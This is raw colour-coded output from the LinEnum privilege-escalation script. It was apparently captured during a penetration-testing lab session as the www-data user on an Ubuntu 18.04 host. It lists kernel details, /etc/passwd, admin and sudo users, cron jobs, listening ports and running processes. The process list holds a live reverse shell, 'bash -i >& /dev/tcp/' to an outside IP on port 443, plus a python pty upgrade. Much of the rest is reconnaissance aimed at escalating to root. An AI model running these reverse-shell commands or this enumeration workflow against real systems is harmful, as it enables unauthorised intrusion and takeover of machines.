
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Mon Apr 12 10:45:28 EDT 2021
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information (continued):[00m
Linux version 4.15.0-20-generic (buildd@lgw01-amd64-039) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018


[00;31m[-] Specific release information:[00m
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic


[00;31m[-] Hostname:[00m
gh0st


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest
root             tty1                      Mon Jan 13 07:52:53 -0500 2020
kibosh           tty1                      Wed Jan  8 11:59:29 -0500 2020


[00;31m[-] Who else is logged on:[00m
 10:45:28 up 5 days, 23:50,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=106(uuidd) gid=110(uuidd) groups=110(uuidd)
uid=107(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=108(landscape) gid=112(landscape) groups=112(landscape)
uid=109(pollinate) gid=1(daemon) groups=1(daemon)
uid=1000(kibosh) gid=1000(kibosh) groups=1000(kibosh),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
uid=110(mysql) gid=116(mysql) groups=116(mysql)
uid=111(postfix) gid=117(postfix) groups=117(postfix)
uid=112(sshd) gid=65534(nogroup) groups=65534(nogroup)


[00;31m[-] It looks like we have some admin users:[00m
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=1000(kibosh) gid=1000(kibosh) groups=1000(kibosh),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
kibosh:x:1000:1000:casper,,,:/home/kibosh:/bin/bash
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:111:117::/var/spool/postfix:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Accounts that have recently used sudo:[00m
/home/kibosh/.sudo_as_admin_successful


[00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x  3 root   root   4.0K Jan  3  2020 .
drwxr-xr-x 23 root   root   4.0K Jan  8  2020 ..
drwxr-xr-x  6 kibosh kibosh 4.0K Jan  9  2020 kibosh


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_LOG_DIR=/var/log/apache2
LANG=C
OLDPWD=/etc
INVOCATION_ID=8ada7a921fd44af6b88bf3d6f433a19d
APACHE_LOCK_DIR=/var/lock/apache2
PWD=/tmp
JOURNAL_STREAM=9:20189
APACHE_RUN_GROUP=www-data
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_USER=www-data
TERM=xterm
APACHE_PID_FILE=/var/run/apache2/apache2.pid
SHLVL=2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root  4096 Jan  7  2020 /bin
drwxr-xr-x 2 root root 12288 Jan  3  2020 /sbin
drwxr-xr-x 2 root root 28672 Jan  7  2020 /usr/bin
drwxr-xr-x 2 root root  4096 Apr 26  2018 /usr/local/bin
drwxr-xr-x 2 root root  4096 Apr 26  2018 /usr/local/sbin
drwxr-xr-x 2 root root  4096 Jan  7  2020 /usr/sbin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
/usr/bin/tmux
/usr/bin/screen


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root  722 Nov 16  2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rw-r--r--  1 root root  589 Mar  7  2018 mdadm
-rw-r--r--  1 root root  712 Dec 18  2019 php
-rw-r--r--  1 root root  191 Jan  3  2020 popularity-contest

/etc/cron.daily:
total 64
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  539 Jul 16  2019 apache2
-rwxr-xr-x  1 root root  376 Nov 20  2017 apport
-rwxr-xr-x  1 root root 1478 Apr 20  2018 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1176 Nov  2  2017 dpkg
-rwxr-xr-x  1 root root  372 Aug 21  2017 logrotate
-rwxr-xr-x  1 root root 1065 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  539 Mar  7  2018 mdadm
-rwxr-xr-x  1 root root  538 Mar  1  2018 mlocate
-rwxr-xr-x  1 root root  249 Jan 25  2018 passwd
-rwxr-xr-x  1 root root 3477 Feb 20  2018 popularity-contest
-rwxr-xr-x  1 root root  246 Mar 21  2018 ubuntu-advantage-tools
-rwxr-xr-x  1 root root  214 Jul 12  2013 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Jan  3  2020 .
drwxr-xr-x 98 root root 4096 Jan  8  2020 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  211 Jul 12  2013 update-notifier-common


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;31m[-] Systemd timers:[00m
NEXT                         LEFT        LAST                         PASSED               UNIT                         ACTIVATES
Mon 2021-04-12 11:09:00 EDT  23min left  Mon 2021-04-12 10:39:07 EDT  6min ago             phpsessionclean.timer        phpsessionclean.service
Mon 2021-04-12 11:10:46 EDT  25min left  Sun 2021-04-11 11:10:46 EDT  23h ago              systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2021-04-12 20:35:36 EDT  9h left     Mon 2021-04-12 08:48:53 EDT  1h 56min ago         apt-daily.timer              apt-daily.service
Tue 2021-04-13 06:56:59 EDT  20h left    Mon 2021-04-12 06:49:36 EDT  3h 55min ago         apt-daily-upgrade.timer      apt-daily-upgrade.service
Mon 2021-04-19 00:00:00 EDT  6 days left Mon 2021-04-12 00:00:08 EDT  10h ago              fstrim.timer                 fstrim.service
n/a                          n/a         Mon 2020-01-13 07:57:12 EST  1 years 2 months ago motd-news.timer              motd-news.service

6 timers listed.
[2mEnable thorough tests to see inactive timers[00m


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.11.1.133  netmask 255.255.0.0  broadcast 10.11.255.255
        inet6 fe80::250:56ff:febf:f13f  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:bf:f1:3f  txqueuelen 1000  (Ethernet)
        RX packets 3726292  bytes 652732007 (652.7 MB)
        RX errors 0  dropped 8607  overruns 0  frame 0
        TX packets 3160485  bytes 1337243841 (1.3 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 10110634  bytes 657833887 (657.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10110634  bytes 657833887 (657.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


[00;31m[-] ARP history:[00m
_gateway (10.11.0.1) at 00:50:56:9f:dc:d5 [ether] on ens160


[00;31m[-] Nameserver(s):[00m
nameserver 127.0.0.53


[00;31m[-] Nameserver(s):[00m
Global
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test

Link 3 (ens160)
      Current Scopes: DNS
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no
         DNS Servers: 10.11.1.133
          DNS Domain: thinc.local


[00;31m[-] Default route:[00m
default         _gateway        0.0.0.0         UG    0      0        0 ens160


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::25                   :::*                    LISTEN      -                   


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
udp    35328      0 127.0.0.53:53           0.0.0.0:*                           -                   


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.5 225196  5556 ?        Ss   Apr06   1:52 /sbin/init
root         2  0.0  0.0      0     0 ?        S    Apr06   0:20 [kthreadd]
root         4  0.0  0.0      0     0 ?        I<   Apr06   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   Apr06   0:00 [mm_percpu_wq]
root         7  0.0  0.0      0     0 ?        S    Apr06   4:57 [ksoftirqd/0]
root         8  0.0  0.0      0     0 ?        I    Apr06   1:07 [rcu_sched]
root         9  0.0  0.0      0     0 ?        I    Apr06   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    Apr06   0:00 [migration/0]
root        11  0.0  0.0      0     0 ?        S    Apr06   0:22 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    Apr06   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    Apr06   0:00 [kdevtmpfs]
root        14  0.0  0.0      0     0 ?        I<   Apr06   0:00 [netns]
root        15  0.0  0.0      0     0 ?        S    Apr06   0:00 [rcu_tasks_kthre]
root        16  0.0  0.0      0     0 ?        S    Apr06   0:00 [kauditd]
root        17  0.0  0.0      0     0 ?        S    Apr06   0:07 [khungtaskd]
root        18  0.0  0.0      0     0 ?        S    Apr06   0:00 [oom_reaper]
root        19  0.0  0.0      0     0 ?        I<   Apr06   0:00 [writeback]
root        20  0.0  0.0      0     0 ?        S    Apr06   0:00 [kcompactd0]
root        21  0.0  0.0      0     0 ?        SN   Apr06   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   Apr06   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        I<   Apr06   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        I<   Apr06   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        I<   Apr06   0:00 [kblockd]
root        26  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ata_sff]
root        27  0.0  0.0      0     0 ?        I<   Apr06   0:00 [md]
root        28  0.0  0.0      0     0 ?        I<   Apr06   0:00 [edac-poller]
root        29  0.0  0.0      0     0 ?        I<   Apr06   0:00 [devfreq_wq]
root        30  0.0  0.0      0     0 ?        I<   Apr06   0:00 [watchdogd]
root        34  0.0  0.0      0     0 ?        S    Apr06   1:05 [kswapd0]
root        35  0.0  0.0      0     0 ?        S    Apr06   0:00 [ecryptfs-kthrea]
root        77  0.0  0.0      0     0 ?        I<   Apr06   0:00 [kthrotld]
root        78  0.0  0.0      0     0 ?        I<   Apr06   0:00 [acpi_thermal_pm]
root        79  0.0  0.0      0     0 ?        S    Apr06   0:01 [scsi_eh_0]
root        80  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_0]
root        81  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_1]
root        82  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_1]
root        89  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ipv6_addrconf]
root        98  0.0  0.0      0     0 ?        I<   Apr06   0:00 [kstrp]
root       115  0.0  0.0      0     0 ?        I<   Apr06   0:00 [charger_manager]
root       171  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_2]
root       172  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_3]
root       173  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_2]
root       174  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_4]
root       175  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_3]
root       176  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_4]
root       177  0.0  0.0      0     0 ?        I<   Apr06   0:00 [vmw_pvscsi_wq_3]
root       178  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_5]
root       180  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_5]
root       181  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_6]
root       182  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_6]
root       183  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_7]
root       184  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_7]
root       185  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_8]
root       186  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_8]
root       187  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_9]
root       192  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_9]
root       197  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_10]
root       198  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_10]
root       200  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_11]
root       201  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_11]
root       204  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ttm_swap]
root       205  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_12]
root       207  0.0  0.0      0     0 ?        S    Apr06   0:00 [irq/16-vmwgfx]
root       208  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_12]
root       210  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_13]
root       212  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_13]
root       214  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_14]
root       216  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_14]
root       219  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_15]
root       221  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_15]
root       223  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_16]
root       225  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_16]
root       227  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_17]
root       228  0.0  0.0      0     0 ?        I<   Apr06   0:19 [kworker/0:1H]
root       230  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_17]
root       232  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_18]
root       235  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_18]
root       236  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_19]
root       238  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_19]
root       239  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_20]
root       241  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_20]
root       243  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_21]
root       244  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_21]
root       246  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_22]
root       248  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_22]
root       249  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_23]
root       251  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_23]
root       253  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_24]
root       255  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_24]
root       257  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_25]
root       259  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_25]
root       261  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_26]
root       262  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_26]
root       264  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_27]
root       265  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_27]
root       266  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_28]
root       267  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_28]
root       268  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_29]
root       269  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_29]
root       270  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_30]
root       271  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_30]
root       272  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_31]
root       273  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_31]
root       274  0.0  0.0      0     0 ?        S    Apr06   0:00 [scsi_eh_32]
root       275  0.0  0.0      0     0 ?        I<   Apr06   0:00 [scsi_tmf_32]
root       371  0.0  0.0      0     0 ?        I<   Apr06   0:00 [raid5wq]
root       426  0.0  0.0      0     0 ?        S    Apr06   2:10 [jbd2/sda1-8]
root       427  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ext4-rsv-conver]
root       476  0.0  0.2 201904  2164 ?        Ssl  Apr06   6:13 /usr/bin/vmtoolsd
root       490  0.0  0.0      0     0 ?        I<   Apr06   0:00 [iscsi_eh]
root       495  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ib-comp-wq]
root       496  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ib_mcast]
root       497  0.0  0.0      0     0 ?        I<   Apr06   0:00 [ib_nl_sa_wq]
root       498  0.0  0.0      0     0 ?        I<   Apr06   0:00 [rdma_cm]
root       509  0.0  0.0  97708   816 ?        Ss   Apr06   0:00 /sbin/lvmetad -f
message+   677  0.0  0.3  50120  3480 ?        Ss   Apr06   0:07 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root       680  0.0  0.2  31320  2240 ?        Ss   Apr06   0:06 /usr/sbin/cron -f
root       683  0.0  0.2  88224  2020 ?        Ss   Apr06   0:00 /usr/bin/VGAuthService
daemon     685  0.0  0.1  28332  1936 ?        Ss   Apr06   0:00 /usr/sbin/atd -f
root       693  0.0  0.4 545900  4056 ?        Ssl  Apr06   0:44 /usr/lib/snapd/snapd
root       694  0.0  0.2 170428  2384 ?        Ssl  Apr06   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher
root       695  0.0  0.1 287524  1144 ?        Ssl  Apr06   0:52 /usr/lib/accountsservice/accounts-daemon
syslog     699  0.0  0.1 263036  1896 ?        Ssl  Apr06   1:17 /usr/sbin/rsyslogd -n
root       700  0.0  0.2 636152  2088 ?        Ssl  Apr06   0:13 /usr/bin/lxcfs /var/lib/lxcfs/
root       786  0.0  0.3 288868  3944 ?        Ssl  Apr06   0:00 /usr/lib/policykit-1/polkitd --no-debug
mysql      943  0.0  0.1 1162328 1168 ?        Sl   Apr06   5:21 /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
root       950  0.0  0.0  25376    84 ?        Ss   Apr06   0:22 /sbin/iscsid
root       951  0.0  0.5  25880  5268 ?        S<Ls Apr06   0:00 /sbin/iscsid
root       986  0.0  0.1  72296  1468 ?        Ss   Apr06   0:00 /usr/sbin/sshd -D
root      1010  0.0  0.1  16180  1448 tty1     Ss+  Apr06   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root      1186  0.0  3.2 370780 33052 ?        Ss   Apr06   1:17 /usr/sbin/apache2 -k start
root      1253  0.0  0.2  67372  2112 ?        Ss   Apr06   0:03 /usr/lib/postfix/sbin/master -w
postfix   1263  0.0  0.2  73856  2604 ?        S    Apr06   0:00 qmgr -l -t unix -u
www-data  1797  0.0  0.2 375124  2084 ?        S    Apr06   0:00 /usr/sbin/apache2 -k start
www-data  1801  0.0  0.0   4628   628 ?        S    Apr06   0:00 sh -c /bin/bash -c 'bash -i >& /dev/tcp/192.168.119.201/443 0>&1'
www-data  1802  0.0  0.1  18376  1756 ?        S    Apr06   0:00 /bin/bash -c bash -i >& /dev/tcp/192.168.119.201/443 0>&1
www-data  1803  0.0  0.1  18508  1808 ?        S    Apr06   0:00 bash -i
www-data  1839  0.0  0.1  37472  1856 ?        S    Apr06   0:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data  1840  0.0  0.1  18508  1852 pts/0    Ss   Apr06   0:00 /bin/bash
systemd+ 12825  0.0  0.1  71816  1724 ?        Ss   Apr10   0:00 /lib/systemd/systemd-networkd
systemd+ 12995  0.0  0.2  70740  2808 ?        Ss   Apr10   0:53 /lib/systemd/systemd-resolved
systemd+ 12996  0.0  0.1 141908  1708 ?        Ssl  Apr10   0:14 /lib/systemd/systemd-timesyncd
root     12997  0.0  0.2  44892  2980 ?        Ss   Apr10   0:03 /lib/systemd/systemd-udevd
root     12998  0.0  2.0 144108 20784 ?        S<s  Apr10   0:53 /lib/systemd/systemd-journald
root     13020  0.0  0.1  70452  1776 ?        Ss   Apr10   0:00 /lib/systemd/systemd-logind
uuidd    13334  0.0  0.0  28136   212 ?        Ss   Apr06   0:00 /usr/sbin/uuidd --socket-activation
root     13386  0.0  0.1   4552  1740 ?        Ss   Apr06   0:00 /usr/sbin/acpid
root     19499  0.0  0.0      0     0 ?        I    Apr11   0:22 [kworker/0:0]
www-data 22276  0.0  3.1 375936 32060 ?        S    06:25   0:01 /usr/sbin/apache2 -k start
root     22819  0.0  0.0      0     0 ?        I    08:48   0:00 [kworker/0:2]
www-data 22874  0.0  3.4 375936 34708 ?        S    08:53   0:00 /usr/sbin/apache2 -k start
www-data 22875  0.0  3.5 375936 35596 ?        S    08:53   0:01 /usr/sbin/apache2 -k start
www-data 22876  0.0  3.4 375992 34768 ?        S    08:53   0:00 /usr/sbin/apache2 -k start
www-data 22884  0.0  3.5 376480 36208 ?        S    08:53   0:01 /usr/sbin/apache2 -k start
www-data 22889  0.0  3.4 375944 35028 ?        S    08:53   0:00 /usr/sbin/apache2 -k start
www-data 22894  0.0  3.4 375936 34788 ?        S    08:53   0:00 /usr/sbin/apache2 -k start
www-data 22896  0.0  3.4 375812 35044 ?        S    08:53   0:01 /usr/sbin/apache2 -k start
www-data 22913  0.0  3.4 375928 34700 ?        S    08:53   0:00 /usr/sbin/apache2 -k start
www-data 22926  0.0  3.4 375936 34780 ?        S    08:53   0:01 /usr/sbin/apache2 -k start
root     23097  0.0  0.0      0     0 ?        I    09:50   0:00 [kworker/u2:1]
